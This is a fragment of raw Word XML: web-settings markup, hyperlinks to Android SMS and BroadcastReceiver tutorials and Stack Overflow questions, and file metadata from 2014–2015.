      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="845557883">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="857474899">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="892345853">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="896359489">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="906570027">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="907693189">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="935678213">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="950164930">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1047997526">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1059209804">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1094518588">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1116873919">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1229341020">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2065367395">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1279139055">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1297684238">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1420057746">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1511069720">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="39941187">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1673751242">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1778452116">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="000000"/>
                    <w:left w:val="none" w:sz="0" w:space="9" w:color="000000"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="000000"/>
                    <w:right w:val="single" w:sz="6" w:space="8" w:color="000000"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1796094869">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="743259904">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="1892686937">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="FF0000"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="FF0000"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="FF0000"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="FF0000"/>
                              </w:divBdr>
                            </w:div>
                          </w:divsChild>
                        </w:div>
                      </w:divsChild>
                    </w:div>
                  </w:divsChild>
                </w:div>
              </w:divsChild>
            </w:div>
          </w:divsChild>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1559979199">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1563176221">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1564293291">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1636989877">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1646011375">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1674454299">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1749186423">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="300"/>
      <w:marRight w:val="300"/>
      <w:marTop w:val="75"/>
      <w:marBottom w:val="300"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1490364775">
          <w:marLeft w:val="2700"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="300"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="8" w:color="AAAAAA"/>
            <w:left w:val="single" w:sz="6" w:space="8" w:color="AAAAAA"/>
            <w:bottom w:val="single" w:sz="6" w:space="8" w:color="AAAAAA"/>
            <w:right w:val="single" w:sz="6" w:space="8" w:color="AAAAAA"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1004892384">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1681617650">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1655061904">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
              </w:divsChild>
            </w:div>
            <w:div w:id="1704861767">
              <w:marLeft w:val="75"/>
              <w:marRight w:val="75"/>
              <w:marTop w:val="75"/>
              <w:marBottom w:val="75"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="6" w:space="4" w:color="AAAAAA"/>
                <w:left w:val="single" w:sz="6" w:space="15" w:color="AAAAAA"/>
                <w:bottom w:val="single" w:sz="6" w:space="4" w:color="AAAAAA"/>
                <w:right w:val="single" w:sz="6" w:space="4" w:color="AAAAAA"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1771852099">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1811753182">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1908686945">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1922331237">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2030712495">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2034530477">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="610281541">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="256133773">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="75"/>
              <w:marBottom w:val="75"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1247957945">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="75"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="single" w:sz="6" w:space="0" w:color="CCCCCC"/>
                    <w:left w:val="single" w:sz="6" w:space="0" w:color="CCCCCC"/>
                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="CCCCCC"/>
                    <w:right w:val="single" w:sz="6" w:space="0"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ndroid-developers.blogspot.in/2013/10/getting-your-sms-apps-ready-for-kitka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csdn.net/xyz_lmn/article/details/1283675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log.csdn.net/beijingshi1/article/details/90943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overflow.com/questions/20109450/abort-sms-intent-on-android-kitka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tackoverflow.com/questions/25988574/delete-sms-from-android-on-4-4-4-affected-rows-0zero-after-deleted" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.vogella.com/tutorials/AndroidBroadcastReceiver/article.html"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951B0-61F6-4EFF-BF74-B3D44E7F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339</Words>
  <Characters>7636</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>63</Lines>
  <Paragraphs>17</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>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zgu666</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-12-26T13:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-11-15T09:27:00Z</dcterms:modified>
</cp:coreProperties>
</file>